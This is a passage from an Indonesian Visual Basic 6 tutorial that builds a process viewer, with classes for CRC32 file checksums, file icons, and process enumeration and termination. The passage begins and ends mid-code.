SCANPROC.BeginScanning

End Sub

Private Sub Cmd_terminate_Click()
If MsgBox("Are you sure to terminate this stupid program?",
vbExclamation + vbYesNo + vbDefaultButton2, "Terminate Process") = vbYes Then
If SCANPROC.TerminateProcess(ListView1.SelectedItem.SubItems(2)) = True Then
Call Cmd_Refresh_Click
End If
End If

End Sub

Private Sub Form_Load()
Set SCANPROC = New cScanProcesses
Set FILEICON = New cGetFileIcon
ListView1.ListItems.Clear

SCANPROC.SystemProcesses = True
m_Time = Timer
SCANPROC.BeginScanning

End Sub

Private Sub Image1_Click()
Frm_Splash.Show
End Sub

Private Sub SCANPROC_CurrentProcess(File As String, Path As String,
ID As Long, Terminate As Boolean)
Dim p_HasImage As Boolean
If Path <> "SYSTEM" Then
p_HasImage = True
On Error Resume Next
ImageList1.ListImages(File).Tag = ""
If Not Err.Number = 0 Then
ImageList1.ListImages.Add , File, FILEICON.Icon(Path & File, SmallIcon)
Err.Clear
End If
End If

Dim lsv As ListItem
If p_HasImage Then
Set lsv = ListView1.ListItems.Add(, , File, , File)
Else
Set lsv = ListView1.ListItems.Add(, , File)
End If
Dim crc As New cCRC32
lsv.SubItems(1) = Path
lsv.SubItems(2) = ID
lsv.SubItems(3) = crc.FileChecksum(Path & File)
lsv.ListSubItems(2).ForeColor = vbBlue
lsv.Selected = True
lsv.EnsureVisible
End Sub

Private Sub SCANPROC_DoneScanning(TotalProcesses As Integer)
Dim p_Elapsed As Single
p_Elapsed = Timer - m_Time
Debug.Print "Total Number of Process Detected: " &
TotalProcesses & vbNewLine & "Total Scan Time: " & p_Elapsed & vbNewLine
Label3.Caption = TotalProcesses
End Sub

Private Sub Image2_Click()
End
End Sub

Private Sub Timer1_Timer()
Dim MS As MEMORYSTATUS

Dim compname As String * 255, cname As String
Dim X As Long

X = GetComputerName(compname, 255)
cname = Trim(compname)
cname = Left(cname, Len(cname) - 1)
lbl(7).Caption = cname

MS.dwLength = Len(MS)
Call GlobalMemoryStatus(MS)
With MS
lbl(0) = Format$(.dwTotalPhys / 1024, "#,###.##") & "KB"
lbl(1) = Format$(.dwAvailPhys / 1024, "#,###.##") & "KB"
lbl(2) = Format$(.dwTotalVirtual / 1024, "#,###.##") & "KB"
lbl(3) = Format$(.dwAvailVirtual / 1024, "#,###.##") & "KB"
lbl(4) = Format$(.dwTotalPageFile / 1024, "#,###.##") & "KB"
lbl(5) = Format$(.dwAvailPageFile / 1024, "#,###.##") & "KB"
lbl(6) = Format$(.dwMemoryLoad, "##0.00") & " %"
End With

End Sub

Lalu kopi pastekan source code dibawah ini dan letakan pada class Module cCRC32

'Author : Noel A. Dacara (noeldacara@yahoo.com)

'Modified by: YaDoY666

Option Explicit

Private Declare Function CallWindowProc Lib "user32"
Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long,
ByVal hwnd As Long, ByVal Msg As Long, ByVal wParam As Long,
ByVal lParam As Long) As Long
Private m_CRC32Asmbl() As Byte
Private m_CRC32Table(0 To 255) As Long

Function FileChecksum(File As String) As String
'Returns the CRC32 checksum value of a specified file.
'Make sure the file isn't empty or invalid to avoid errors later
If Len(Dir$(File)) = 0 Then
Exit Function
End If

On Error GoTo Err_Handler

Dim Arr() As Byte
Dim f As Integer

f = FreeFile 'Get any available file number for use

Open File For Binary Access Read As f
'Redimensionized array according to length of file
ReDim Arr(0 To LOF(f) - 1) As Byte
Get #f, , Arr() 'Get file contents
Close #f

'Calculate CRC32 checksum
FileChecksum = Hex$(CalculateBytes(Arr))

Err_Handler:
End Function

Function StringChecksum(Str As String) As String
If Not Len(Str) = 0 Then
StringChecksum = Hex$(CalculateBytes(StrConv(Str, vbFromUnicode)))
End If
End Function

Private Function CalculateBytes(Arr() As Byte) As Long
Dim CRC32 As Long
CRC32 = &HFFFFFFFF 'CRC32 must have this default value

On Local Error GoTo Err_Handler

Dim i As Long
i = UBound(Arr) - LBound(Arr) + 1 'Precalculate size of array

Call CallWindowProc(VarPtr(m_CRC32Asmbl(0)),
VarPtr(CRC32), VarPtr(Arr(LBound(Arr))), VarPtr(m_CRC32Table(0)), i)

Err_Handler:
CalculateBytes = (Not CRC32) 'Return CRC32 value
End Function

Private Sub Class_Initialize()
Dim i As Long

m_CRC32Table(0) = &H0
m_CRC32Table(1) = &H77073096
m_CRC32Table(2) = &HEE0E612C
m_CRC32Table(3) = &H990951BA
m_CRC32Table(4) = &H76DC419
m_CRC32Table(5) = &H706AF48F
m_CRC32Table(6) = &HE963A535
m_CRC32Table(7) = &H9E6495A3
m_CRC32Table(8) = &HEDB8832
m_CRC32Table(9) = &H79DCB8A4
m_CRC32Table(10) = &HE0D5E91E
m_CRC32Table(11) = &H97D2D988
m_CRC32Table(12) = &H9B64C2B
m_CRC32Table(13) = &H7EB17CBD
m_CRC32Table(14) = &HE7B82D07
m_CRC32Table(15) = &H90BF1D91
m_CRC32Table(16) = &H1DB71064
m_CRC32Table(17) = &H6AB020F2
m_CRC32Table(18) = &HF3B97148
m_CRC32Table(19) = &H84BE41DE
m_CRC32Table(20) = &H1ADAD47D
m_CRC32Table(21) = &H6DDDE4EB
m_CRC32Table(22) = &HF4D4B551
m_CRC32Table(23) = &H83D385C7
m_CRC32Table(24) = &H136C9856
m_CRC32Table(25) = &H646BA8C0
m_CRC32Table(26) = &HFD62F97A
m_CRC32Table(27) = &H8A65C9EC
m_CRC32Table(28) = &H14015C4F
m_CRC32Table(29) = &H63066CD9
m_CRC32Table(30) = &HFA0F3D63
m_CRC32Table(31) = &H8D080DF5
m_CRC32Table(32) = &H3B6E20C8
m_CRC32Table(33) = &H4C69105E
m_CRC32Table(34) = &HD56041E4
m_CRC32Table(35) = &HA2677172
m_CRC32Table(36) = &H3C03E4D1
m_CRC32Table(37) = &H4B04D447
m_CRC32Table(38) = &HD20D85FD
m_CRC32Table(39) = &HA50AB56B
m_CRC32Table(40) = &H35B5A8FA
m_CRC32Table(41) = &H42B2986C
m_CRC32Table(42) = &HDBBBC9D6
m_CRC32Table(43) = &HACBCF940
m_CRC32Table(44) = &H32D86CE3
m_CRC32Table(45) = &H45DF5C75
m_CRC32Table(46) = &HDCD60DCF
m_CRC32Table(47) = &HABD13D59
m_CRC32Table(48) = &H26D930AC
m_CRC32Table(49) = &H51DE003A
m_CRC32Table(50) = &HC8D75180
m_CRC32Table(51) = &HBFD06116
m_CRC32Table(52) = &H21B4F4B5
m_CRC32Table(53) = &H56B3C423
m_CRC32Table(54) = &HCFBA9599
m_CRC32Table(55) = &HB8BDA50F
m_CRC32Table(56) = &H2802B89E
m_CRC32Table(57) = &H5F058808
m_CRC32Table(58) = &HC60CD9B2
m_CRC32Table(59) = &HB10BE924
m_CRC32Table(60) = &H2F6F7C87
m_CRC32Table(61) = &H58684C11
m_CRC32Table(62) = &HC1611DAB
m_CRC32Table(63) = &HB6662D3D
m_CRC32Table(64) = &H76DC4190
m_CRC32Table(65) = &H1DB7106
m_CRC32Table(66) = &H98D220BC
m_CRC32Table(67) = &HEFD5102A
m_CRC32Table(68) = &H71B18589
m_CRC32Table(69) = &H6B6B51F
m_CRC32Table(70) = &H9FBFE4A5
m_CRC32Table(71) = &HE8B8D433
m_CRC32Table(72) = &H7807C9A2
m_CRC32Table(73) = &HF00F934
m_CRC32Table(74) = &H9609A88E
m_CRC32Table(75) = &HE10E9818
m_CRC32Table(76) = &H7F6A0DBB
m_CRC32Table(77) = &H86D3D2D
m_CRC32Table(78) = &H91646C97
m_CRC32Table(79) = &HE6635C01
m_CRC32Table(80) = &H6B6B51F4
m_CRC32Table(81) = &H1C6C6162
m_CRC32Table(82) = &H856530D8
m_CRC32Table(83) = &HF262004E
m_CRC32Table(84) = &H6C0695ED
m_CRC32Table(85) = &H1B01A57B
m_CRC32Table(86) = &H8208F4C1
m_CRC32Table(87) = &HF50FC457
m_CRC32Table(88) = &H65B0D9C6
m_CRC32Table(89) = &H12B7E950
m_CRC32Table(90) = &H8BBEB8EA
m_CRC32Table(91) = &HFCB9887C
m_CRC32Table(92) = &H62DD1DDF
m_CRC32Table(93) = &H15DA2D49
m_CRC32Table(94) = &H8CD37CF3
m_CRC32Table(95) = &HFBD44C65
m_CRC32Table(96) = &H4DB26158
m_CRC32Table(97) = &H3AB551CE
m_CRC32Table(98) = &HA3BC0074
m_CRC32Table(99) = &HD4BB30E2
m_CRC32Table(100) = &H4ADFA541
m_CRC32Table(101) = &H3DD895D7
m_CRC32Table(102) = &HA4D1C46D
m_CRC32Table(103) = &HD3D6F4FB
m_CRC32Table(104) = &H4369E96A
m_CRC32Table(105) = &H346ED9FC
m_CRC32Table(106) = &HAD678846
m_CRC32Table(107) = &HDA60B8D0
m_CRC32Table(108) = &H44042D73
m_CRC32Table(109) = &H33031DE5
m_CRC32Table(110) = &HAA0A4C5F
m_CRC32Table(111) = &HDD0D7CC9
m_CRC32Table(112) = &H5005713C
m_CRC32Table(113) = &H270241AA
m_CRC32Table(114) = &HBE0B1010
m_CRC32Table(115) = &HC90C2086
m_CRC32Table(116) = &H5768B525
m_CRC32Table(117) = &H206F85B3
m_CRC32Table(118) = &HB966D409
m_CRC32Table(119) = &HCE61E49F
m_CRC32Table(120) = &H5EDEF90E
m_CRC32Table(121) = &H29D9C998
m_CRC32Table(122) = &HB0D09822
m_CRC32Table(123) = &HC7D7A8B4
m_CRC32Table(124) = &H59B33D17
m_CRC32Table(125) = &H2EB40D81
m_CRC32Table(126) = &HB7BD5C3B
m_CRC32Table(127) = &HC0BA6CAD
m_CRC32Table(128) = &HEDB88320
m_CRC32Table(129) = &H9ABFB3B6
m_CRC32Table(130) = &H3B6E20C
m_CRC32Table(131) = &H74B1D29A
m_CRC32Table(132) = &HEAD54739
m_CRC32Table(133) = &H9DD277AF
m_CRC32Table(134) = &H4DB2615
m_CRC32Table(135) = &H73DC1683
m_CRC32Table(136) = &HE3630B12
m_CRC32Table(137) = &H94643B84
m_CRC32Table(138) = &HD6D6A3E
m_CRC32Table(139) = &H7A6A5AA8
m_CRC32Table(140) = &HE40ECF0B
m_CRC32Table(141) = &H9309FF9D
m_CRC32Table(142) = &HA00AE27
m_CRC32Table(143) = &H7D079EB1
m_CRC32Table(144) = &HF00F9344
m_CRC32Table(145) = &H8708A3D2
m_CRC32Table(146) = &H1E01F268
m_CRC32Table(147) = &H6906C2FE
m_CRC32Table(148) = &HF762575D
m_CRC32Table(149) = &H806567CB
m_CRC32Table(150) = &H196C3671
m_CRC32Table(151) = &H6E6B06E7
m_CRC32Table(152) = &HFED41B76
m_CRC32Table(153) = &H89D32BE0
m_CRC32Table(154) = &H10DA7A5A
m_CRC32Table(155) = &H67DD4ACC
m_CRC32Table(156) = &HF9B9DF6F
m_CRC32Table(157) = &H8EBEEFF9
m_CRC32Table(158) = &H17B7BE43
m_CRC32Table(159) = &H60B08ED5
m_CRC32Table(160) = &HD6D6A3E8
m_CRC32Table(161) = &HA1D1937E
m_CRC32Table(162) = &H38D8C2C4
m_CRC32Table(163) = &H4FDFF252
m_CRC32Table(164) = &HD1BB67F1
m_CRC32Table(165) = &HA6BC5767
m_CRC32Table(166) = &H3FB506DD
m_CRC32Table(167) = &H48B2364B
m_CRC32Table(168) = &HD80D2BDA
m_CRC32Table(169) = &HAF0A1B4C
m_CRC32Table(170) = &H36034AF6
m_CRC32Table(171) = &H41047A60
m_CRC32Table(172) = &HDF60EFC3
m_CRC32Table(173) = &HA867DF55
m_CRC32Table(174) = &H316E8EEF
m_CRC32Table(175) = &H4669BE79
m_CRC32Table(176) = &HCB61B38C
m_CRC32Table(177) = &HBC66831A
m_CRC32Table(178) = &H256FD2A0
m_CRC32Table(179) = &H5268E236
m_CRC32Table(180) = &HCC0C7795
m_CRC32Table(181) = &HBB0B4703
m_CRC32Table(182) = &H220216B9
m_CRC32Table(183) = &H5505262F
m_CRC32Table(184) = &HC5BA3BBE
m_CRC32Table(185) = &HB2BD0B28
m_CRC32Table(186) = &H2BB45A92
m_CRC32Table(187) = &H5CB36A04
m_CRC32Table(188) = &HC2D7FFA7
m_CRC32Table(189) = &HB5D0CF31
m_CRC32Table(190) = &H2CD99E8B
m_CRC32Table(191) = &H5BDEAE1D
m_CRC32Table(192) = &H9B64C2B0
m_CRC32Table(193) = &HEC63F226
m_CRC32Table(194) = &H756AA39C
m_CRC32Table(195) = &H26D930A
m_CRC32Table(196) = &H9C0906A9
m_CRC32Table(197) = &HEB0E363F
m_CRC32Table(198) = &H72076785
m_CRC32Table(199) = &H5005713
m_CRC32Table(200) = &H95BF4A82
m_CRC32Table(201) = &HE2B87A14
m_CRC32Table(202) = &H7BB12BAE
m_CRC32Table(203) = &HCB61B38
m_CRC32Table(204) = &H92D28E9B
m_CRC32Table(205) = &HE5D5BE0D
m_CRC32Table(206) = &H7CDCEFB7
m_CRC32Table(207) = &HBDBDF21
m_CRC32Table(208) = &H86D3D2D4
m_CRC32Table(209) = &HF1D4E242
m_CRC32Table(210) = &H68DDB3F8
m_CRC32Table(211) = &H1FDA836E
m_CRC32Table(212) = &H81BE16CD
m_CRC32Table(213) = &HF6B9265B
m_CRC32Table(214) = &H6FB077E1
m_CRC32Table(215) = &H18B74777
m_CRC32Table(216) = &H88085AE6
m_CRC32Table(217) = &HFF0F6A70
m_CRC32Table(218) = &H66063BCA
m_CRC32Table(219) = &H11010B5C
m_CRC32Table(220) = &H8F659EFF
m_CRC32Table(221) = &HF862AE69
m_CRC32Table(222) = &H616BFFD3
m_CRC32Table(223) = &H166CCF45
m_CRC32Table(224) = &HA00AE278
m_CRC32Table(225) = &HD70DD2EE
m_CRC32Table(226) = &H4E048354
m_CRC32Table(227) = &H3903B3C2
m_CRC32Table(228) = &HA7672661
m_CRC32Table(229) = &HD06016F7
m_CRC32Table(230) = &H4969474D
m_CRC32Table(231) = &H3E6E77DB
m_CRC32Table(232) = &HAED16A4A
m_CRC32Table(233) = &HD9D65ADC
m_CRC32Table(234) = &H40DF0B66
m_CRC32Table(235) = &H37D83BF0
m_CRC32Table(236) = &HA9BCAE53
m_CRC32Table(237) = &HDEBB9EC5
m_CRC32Table(238) = &H47B2CF7F
m_CRC32Table(239) = &H30B5FFE9
m_CRC32Table(240) = &HBDBDF21C
m_CRC32Table(241) = &HCABAC28A
m_CRC32Table(242) = &H53B39330
m_CRC32Table(243) = &H24B4A3A6
m_CRC32Table(244) = &HBAD03605
m_CRC32Table(245) = &HCDD70693
m_CRC32Table(246) = &H54DE5729
m_CRC32Table(247) = &H23D967BF
m_CRC32Table(248) = &HB3667A2E
m_CRC32Table(249) = &HC4614AB8
m_CRC32Table(250) = &H5D681B02
m_CRC32Table(251) = &H2A6F2B94
m_CRC32Table(252) = &HB40BBE37
m_CRC32Table(253) = &HC30C8EA1
m_CRC32Table(254) = &H5A05DF1B
m_CRC32Table(255) = &H2D02EF8D

Const ASM As String = "5589E557565053518B45088B008B750
C8B7D108B4D1431DB8A1E30C3C1E80833049F464975F28B4D08890
1595B585E5F89EC5DC21000"

ReDim m_CRC32Asmbl(0 To Len(ASM) \ 2 - 1) 'Initialize CRC32 precompiled assembly code

For i = 1 To Len(ASM) Step 2
m_CRC32Asmbl(i \ 2) = Val("&H" & Mid$(ASM, i, 2))
Next i
End Sub

Lalu kopi pastekan source dibawah ini dan letakan pada class module cGetFileIcon

Option Explicit

'Author : Noel A. Dacara (noeldacara@yahoo.com)

'Modified by: YaDoY666

'Modified API Declaration
Private Declare Function SHGetFileInfo Lib "shell32.dll"
Alias "SHGetFileInfoA" (ByVal pszPath As String,
ByVal dwFileAttributes As Long,
ByRef psfi As SHFILEINFO, ByVal cbFileInfo As Long, ByVal uFlags As ESHGetFileInfoFlagConstants) As Long

Private Declare Sub OleCreatePictureIndirect
Lib "oleaut32.dll" (ByRef lpPictDesc As PictDesc,
ByRef riid As Guid, ByVal fOwn As Long, ByRef lplpvObj
As IPictureDisp)

'API Constants
Private Const ERRORAPI As Long = 0
Private Const MAX_PATH As Long = 260

'API Types
Private Type Guid
Data1 As Long
Data2 As Integer
Data3 As Integer
Data4(0 To 7) As Byte
End Type

Private Type PictDesc
cbSizeofStruct As Long
picType As Long
hImage As Long
xExt As Long
yExt As Long
End Type

Private Type SHFILEINFO
hIcon As Long ' : icon
iIcon As Long ' : icondex
dwAttributes As Long ' : SFGAO_ flags
szDisplayName As String * MAX_PATH ' : display name (or path)
szTypeName As String * 80 ' : type name
End Type

'User-Defined API Enum
Private Enum ESHGetFileInfoFlagConstants
SHGFI_ATTRIBUTES = &H800 'get file attributes
SHGFI_DISPLAYNAME = &H200 'get display name
SHGFI_EXETYPE = &H2000 'get exe type
SHGFI_ICON = &H100 'get icon handle and index
SHGFI_LARGEICON = &H0 'get file's large icon
SHGFI_LINKOVERLAY = &H8000 'add link overlay on the icon
SHGFI_OPENICON = &H2 'get file's open icon
SHGFI_SELECTED = &H10000 'blend icon with the system highlight color
SHGFI_SHELLICONSIZE = &H4 'get shell-sized icon
SHGFI_SMALLICON = &H1 'get file's small icon
SHGFI_SYSICONINDEX = &H4000 'get icon index from system image list
SHGFI_TYPENAME = &H400 'get file type description
SHGFI_USEFILEATTRIBUTES = &H10 'use dwFileAttributes parameter
End Enum

Enum EFileIconTypeConstants
LargeIcon = 0
SmallIcon = 1
End Enum

Enum EFileExeTypeConstants
MSDosApp = 2 'MS-DOS .EXE, .COM or .BAT file
NonExecutable = 0 'Nonexecutable file or an error condition
Win32Console = 3 'Win32 console application
WindowsApp = 1 'Windows application
End Enum

'Variable Declarations
Private m_File As String
Private m_Handle As Long
Private m_IconType As EFileIconTypeConstants
Private m_OpenState As Boolean
Private m_Overlay As Boolean
Private m_Selected As Boolean

Property Get DisplayName(Optional File) As String
'Returns the display name of the specified file.
Dim p_Null As Long
Dim p_Ret As Long
Dim p_SHFI As SHFILEINFO

If IsMissing(File) Then
File = m_File
End If

p_Ret = SHGetFileInfo(CStr(File), 0&, p_SHFI, Len(p_SHFI), SHGFI_DISPLAYNAME)

If Not p_Ret = ERRORAPI Then
DisplayName = p_SHFI.szDisplayName

p_Null = InStr(1, DisplayName, vbNullChar)

If p_Null > 0& Then
DisplayName = Left$(DisplayName, p_Null - 1)
End If
End If
End Property

Property Get ExeType(Optional File) As EFileExeTypeConstants
'Returns the display name of the specified file.
Dim p_Ret As Long
Dim p_SHFI As SHFILEINFO

If IsMissing(File) Then
File = m_File
End If

p_Ret = SHGetFileInfo(CStr(File), 0&, p_SHFI, Len(p_SHFI), SHGFI_EXETYPE)

If p_Ret = 0 Then
ExeType = NonExecutable
Else
If HiWord(p_Ret) > 0 Then 'NE 0x00004E45 or PE 0x00005045
ExeType = WindowsApp
Else
Select Case LoWord(p_Ret)
Case 23117 'MZ 0x00004D5A
ExeType = MSDosApp
Case 17744 'PE 0x00005045
ExeType = Win32Console
End Select
End If
End If
End Property

Property Get File() As String
'Returns/sets the complete file path to be used.
File = m_File
End Property

Property Let File(Value As String)
m_File = Value
End Property

Property Get Handle() As Long
'Returns/sets the icon handle to be used by the IconEx property.
Handle = m_Handle
End Property

Property Let Handle(Value As Long)
m_Handle = Value
End Property

Property Get IconType() As EFileIconTypeConstants
'Returns/sets the type of icon to retrieve.
IconType = m_IconType
End Property

Property Let IconType(Value As EFileIconTypeConstants)
m_IconType = Value
End Property

Property Get Icon(Optional File, Optional IconType) As IPictureDisp
'Returns the icon of the specified file.
If IsMissing(File) Then
File = m_File
End If

If IsMissing(IconType) Then
IconType = m_IconType
End If

Dim p_Flags As ESHGetFileInfoFlagConstants
Dim p_hIcon As Long
Dim p_Ret As Long
Dim p_SHFI As SHFILEINFO

If m_IconType = LargeIcon Then
p_Flags = SHGFI_ICON Or SHGFI_LARGEICON
Else
p_Flags = SHGFI_ICON Or SHGFI_SMALLICON
End If

If m_Overlay Then
p_Flags = p_Flags Or SHGFI_LINKOVERLAY
End If

If m_Selected Then
p_Flags = p_Flags Or SHGFI_SELECTED
Else
p_Flags = p_Flags And Not SHGFI_SELECTED
End If

If m_OpenState Then
p_Flags = p_Flags Or SHGFI_OPENICON
Else
p_Flags = p_Flags And Not SHGFI_OPENICON
End If

p_Ret = SHGetFileInfo(CStr(File), 0&, p_SHFI, Len(p_SHFI), p_Flags)

If Not p_Ret = ERRORAPI Then
p_hIcon = p_SHFI.hIcon

If Not p_hIcon = 0& Then
Set Icon = IconEx(p_hIcon)
End If
End If
End Property

Property Get IconEx(Optional hIcon As Long) As IPictureDisp
'Returns the file's icon using the specified icon handle.
If hIcon = 0& Then
hIcon = m_Handle

If hIcon = 0& Then
Exit Property
End If
End If

Dim p_Picture As IPictureDisp
Dim p_PicDesc As PictDesc
Dim p_Guid As Guid

p_PicDesc.cbSizeofStruct = Len(p_PicDesc)
p_PicDesc.picType = vbPicTypeIcon
p_PicDesc.hImage = hIcon

'IPicture GUID {7BF80980-BF32-101A-8BBB-00AA00300CAB}
With p_Guid
.Data1 = &H7BF80980
.Data2 = &HBF32
.Data3 = &H101A
.Data4(0) = &H8B
.Data4(1) = &HBB
.Data4(2) = &H0
.Data4(3) = &HAA
.Data4(4) = &H0
.Data4(5) = &H30
.Data4(6) = &HC
.Data4(7) = &HAB
End With
'From vbAccelerator... (http://www.vbaccelerator.com)

OleCreatePictureIndirect p_PicDesc, p_Guid, True, p_Picture

Set IconEx = p_Picture
End Property

Property Get LinkOverlay() As Boolean
'Returns/sets a value to determine if a linkoverlay icon is displayed on the icon.
LinkOverlay = m_Overlay
End Property

Property Let LinkOverlay(Value As Boolean)
m_Overlay = Value
End Property

Property Get OpenState() As Boolean
'Returns/sets a value to determine if the icon will be in open state. (Ex. Folders)
OpenState = m_OpenState
End Property

Property Let OpenState(Value As Boolean)
m_OpenState = Value
End Property

Property Get Selected() As Boolean
'Returns/sets a value to determine if the icon is in selected state.
Selected = m_Selected
End Property

Property Let Selected(Value As Boolean)
m_Selected = Value
End Property

Property Get TypeName(Optional File) As String
'Returns the type name of the specified file.
Dim p_Null As Long
Dim p_Ret As Long
Dim p_SHFI As SHFILEINFO

If IsMissing(File) Then
File = m_File
End If

p_Ret = SHGetFileInfo(CStr(File), 0&, p_SHFI, Len(p_SHFI), SHGFI_TYPENAME)

If Not p_Ret = ERRORAPI Then
TypeName = p_SHFI.szTypeName

p_Null = InStr(1, TypeName, vbNullChar)

If p_Null > 0& Then
TypeName = Left$(TypeName, p_Null - 1)
End If
End If
End Property

'Private properties
Private Property Get HiWord(DWord As Long) As Long
HiWord = (DWord And &HFFFF0000) \ &H10000
End Property

Private Property Get LoWord(DWord As Long) As Long
If DWord And &H8000& Then
LoWord = DWord Or &HFFFF0000
Else
LoWord = DWord And &HFFFF&
End If
End Property

Lalu kopi pastekan source code dibwah ini dan letakan pada class module cScanProcesses

Option Explicit

'Author : Noel A. Dacara (noeldacara@yahoo.com)

'Modified by: YaDoY666

'API Declarations
Private Declare Function CloseHandle Lib "kernel32.dll" (ByVal hObject As Long) As Long
Private Declare Function CreateToolhelp32Snapshot Lib "kernel32.dll"
(ByVal dwFlags As Long, ByVal th32ProcessID As Long) As Long
Private Declare Function EnumProcessModules Lib "psapi.dll"
(ByVal hProcess As Long, ByRef lphModule As Long,
ByVal cb As Long, ByRef lpcbNeeded As Long) As Long
Private Declare Function GetCurrentProcess Lib "kernel32.dll" () As Long
Private Declare Function GetModuleFileNameEx Lib "psapi.dll"
Alias "GetModuleFileNameExA" (ByVal hProcess As Long,
ByVal hModule As Long, ByVal lpFilename As String,
ByVal nSize As Long) As Long
Private Declare Function GetVersion Lib "kernel32.dll" () As Long
Private Declare Function GetWindowsDirectory Lib "kernel32.dll"
Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String,
ByVal nSize As Long) As Long
Private Declare Function OpenProcess Lib "kernel32.dll"
(ByVal dwDesiredAccess As Long, ByVal bInheritHandle
As Long, ByVal dwProcessId As Long) As Long
Private Declare Function OpenProcessToken Lib "advapi32.dll"
(ByVal ProcessHandle As Long, ByVal DesiredAccess
As Long, ByRef TokenHandle As Long) As Long
Private Declare Function Process32First Lib "kernel32.dll"
(ByVal hSnapshot As Long, ByRef lppe As PROCESSENTRY32) As Long
Private Declare Function Process32Next Lib "kernel32.dll"
(ByVal hSnapshot As Long, ByRef lppe As PROCESSENTRY32) As Long

'Modified API Declaration
Private Declare Function AdjustTokenPrivileges Lib "advapi32.dll"
(ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long,
ByRef NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long,
ByVal PreviousState As Long, ByVal ReturnLength As Long) As Long
Private Declare Function LookupPrivilegeValue Lib "advapi32.dll"
Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String,
ByVal lpName As String, ByRef lpLuid As LUID) As Long
Private Declare Function TerminateProcess32 Lib "kernel32.dll"
Alias "TerminateProcess" (ByVal hProcess As Long,
ByVal uExitCode As Long) As Long

'API Constants
Private Const ANYSIZE_ARRAY As Long = 1
Private Const MAX_PATH As Long = 260
Private Const PROCESS_QUERY_INFORMATION As Long = (&H400)
Private Const PROCESS_VM_READ As Long = (&H10)
Private Const SE_DEBUG_NAME As String = "SeDebugPrivilege"
Private Const SE_PRIVILEGE_ENABLED As Long = &H2
Private Const STANDARD_RIGHTS_REQUIRED As Long = &HF0000
Private Const SYNCHRONIZE As Long = &H100000
Private Const TH32CS_SNAPPROCESS As Long = &H2
Private Const TOKEN_ADJUST_PRIVILEGES As Long = &H20
Private Const TOKEN_QUERY As Long = &H8
Private Const PROCESS_ALL_ACCESS As Long = (STANDARD_RIGHTS_REQUIRED
Or SYNCHRONIZE Or &HFFF)

'API Types
Private Type LARGE_INTEGER
lowpart As Long
highpart As Long
End Type

Private Type LUID
lowpart As Long
highpart As Long
End Type

Private Type LUID_AND_ATTRIBUTES
pLuid As LUID
Attributes As Long
End Type

Private Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * MAX_PATH
End Type

Private Type TOKEN_PRIVILEGES
PrivilegeCount As Long
Privileges(ANYSIZE_ARRAY) As LUID_AND_ATTRIBUTES
End Type

'Variable Declarations
Private m_Cancel As Boolean
Private m_FullPathName As String
Private m_NumProcesses As Integer
Private m_ProcessID As Long
Private m_Scanning As Boolean
Private m_SystemProcess As Boolean

Event CurrentProcess(File As String, Path As String, ID As Long,
Terminate As Boolean)
'Occurs everytime a process is scanned.
Event DoneScanning(TotalProcesses As Integer)
'Occures after scanning all processes.

#If False Then

Private File, Path, ID, Terminate, TotalProcesses
#End If

Property Get SystemProcesses() As Boolean

SystemProcesses = m_SystemProcess
End Property

Property Let SystemProcesses(Value As Boolean)
m_SystemProcess = Value
End Property

Property Get CurrentProcessID() As Long

CurrentProcessID = m_ProcessID
End Property

Property Get CurrentProcessPath() As String

CurrentProcessPath = m_FullPathName
End Property

Property Get Scanning() As Boolean

Scanning = m_Scanning
End Property

Property Get TotalProcesses() As Integer
TotalProcesses = m_NumProcesses
End Property

'Procedures
Sub BeginScanning()

m_Cancel = False
m_FullPathName = ""
m_NumProcesses = 0

m_Scanning = True
Call ScanForProcesses
m_Scanning = False

m_Cancel = False
m_FullPathName = ""
m_ProcessID = -1
RaiseEvent DoneScanning((m_NumProcesses))
End Sub

Sub CancelScanning()

m_Cancel = True
End Sub

Function TerminateProcess(Optional ProcessID As Long = -1) As Boolean
scanned process.
If ProcessID = -1 Then
ProcessID = Me.CurrentProcessID 'Get ID of currently scanned process

If ProcessID = -1 Then
Exit Function
End If
End If

Dim p_Privileges As TOKEN_PRIVILEGES
Dim p_Token As Long

If GetVersion >= 0 Then
If OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES Or TOKEN_QUERY, p_Token) = 0 Then
GoTo End_Function
End If

If LookupPrivilegeValue("", SE_DEBUG_NAME, p_Privileges.Privileges(ANYSIZE_ARRAY).pLuid) = 0 Then
GoTo End_Function
End If

p_Privileges.PrivilegeCount = 1
p_Privileges.Privileges(ANYSIZE_ARRAY).Attributes = SE_PRIVILEGE_ENABLED

If AdjustTokenPrivileges(p_Token, 0&, p_Privileges, 0&, 0&, 0&) = 0 Then
GoTo End_Function
End If
End If

Dim p_Process As Long
Dim p_Result As Long
p_Process = OpenProcess(PROCESS_ALL_ACCESS, 0&, ProcessID)

If Not p_Process = 0 Then
'Attempt to terminate the process
p_Result = TerminateProcess32(p_Process, 0&)
DoEvents
TerminateProcess = (Not p_Result = 0)
CloseHandle p_Process
End If

If GetVersion >= 0 Then
'Restore original privilege
p_Privileges.Privileges(ANYSIZE_ARRAY).Attributes = 0
AdjustTokenPrivileges p_Token, 0&, p_Privileges, 0&, 0&, 0&

End_Function:
If Not p_Token = 0 Then
Call CloseHandle(p_Token)
End If
End If
End Function

'Private Procedures
Private Sub ScanForProcesses()
DoEvents 'Process other system events before scanning for processes

Dim p_Snapshot As Long
p_Snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0&)

If Not p_Snapshot = 0 Then
Dim p_NullPos As Integer
Dim p_Process As Long
Dim p_ProcessEntry As PROCESSENTRY32
Dim p_ProcessID As Long
Dim p_ProcessName As String
Dim p_ProcessPath As String
Dim p_Terminate As Boolean

p_ProcessEntry.dwSize = Len(p_ProcessEntry)
p_Process = Process32First(p_Snapshot, p_ProcessEntry)

Do While p_Process 'Iterate through all processes
If m_Cancel Then
Exit Do 'Abort the whole scanning process
End If

DoEvents 'Ensure that the system processes other events
p_ProcessName = p_ProcessEntry.szExeFile

p_NullPos = InStr(1, p_ProcessName, vbNullChar)
If Not p_NullPos = 0 Then
p_ProcessName = Left(p_ProcessName, p_NullPos - 1)
End If

p_ProcessID = p_ProcessEntry.th32ProcessID
